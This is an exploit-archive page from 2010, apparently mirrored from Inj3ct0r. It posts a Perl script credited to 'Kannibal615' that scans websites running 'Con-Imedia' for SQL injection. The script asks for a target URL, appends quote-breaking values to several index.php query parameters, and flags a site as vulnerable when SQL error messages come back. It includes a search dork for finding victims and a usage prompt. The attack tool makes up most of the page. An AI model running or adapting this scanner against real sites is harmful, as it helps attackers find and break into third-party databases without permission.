IMEDIA (index.php) SQL Injection Vulnerability
Posted on 20 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>IMEDIA (index.php) SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================== IMEDIA (index.php) SQL Injection Vulnerability ============================================== # Exploit Titre: IMEDIA (index.php) SQL Injection Vulnerability # Date: 19-05-2010 # Auteur: Kannibal615 # Link Software: N/A # Version: N/A # Test? sur: ALL # CVE: N/A # Code: # DORK : Powered by: Con-Imedia #!usr/bin/perl -w use HTTP::Request; use LWP::UserAgent; system ("cls"); print " "; print " @@ @@ @@@@@@ @@ @@ @@@@ @@@@@@@ @@ @@ @@@@@@@ @@@@@ "; print " @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ "; print " @@ @@ @@ @@@ @@@@@@@@ @@ @@ @@ @@@@ @@@@@@ @@ @@ "; print " @@ @@ @@ @@@ @@@@@@@@ @@@@@@@@ @@ @@ @@ @@@@@@ @@ @@ "; print " @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ "; print " @@ @@@@@@ @@ @@ @@ @@ @@@@@@@ @@ @@ @@@@@@@ @@ @@ "; print " LA ILAH ILLA ALLAH MOUHAMED RASOUL ALLAH "; print " "; print "[*]Coded By: Kannibal615 > Tunisian Genius Security > zn[at]live[dot]de "; print "[*]Greetz 1: My Best Friend AYMEN > THE P!RATOR "; print '[*]Greetz 2: Pc-InseCt/alghaking/emptyzero/V!Ru$_T4ckJ3n'; print " [*]Greetz 3: To All VBHACKER.NET Members "; print "[*]Dork : Powered by: Con-Imedia "; print "[*]Usage : k615>[target here] "; print "[*]Exemple : k615> www.target.com "; print " "; print "k615>"; $input=<>; chomp $input; if ( $input !~ /^http:/ ) { $input = 'http://' . $input; } if ( $input !~ //$/ ) { $input = $input . '/'; } @path=('index1.php?linkid=999.9"','index1.php?sublinkid=999.9"','index1.php?linkid=&sublink=999.9"', 'index2.php?linkid=999.9"','index3.php?day=999.9"'); foreach $ways(@path){ $final=$input.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /sql/ || $response->content =~ /SQL error/ || $response->content =~ /SQL/ || $response->content =~ /syntax/ || $response->content =~ /Invalid query/ || $response->content =~ /your SQL/ || $response->content =~ /MySQL/ || $response->content =~ /at line 1/ || $response->content =~ /MySQL server/ || $response->content =~ /version for/ || $response->content =~ /Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near/ || $response->content =~ /fetch/ ){ print "[+] Vulnerable -> $final "; } else{ print "[-] Not Vulner <- $final "; } } print " SOBHAN ALLAH "; print "press enter to exit"; $enter=<>; #Tunisian Genius Security # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-20]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
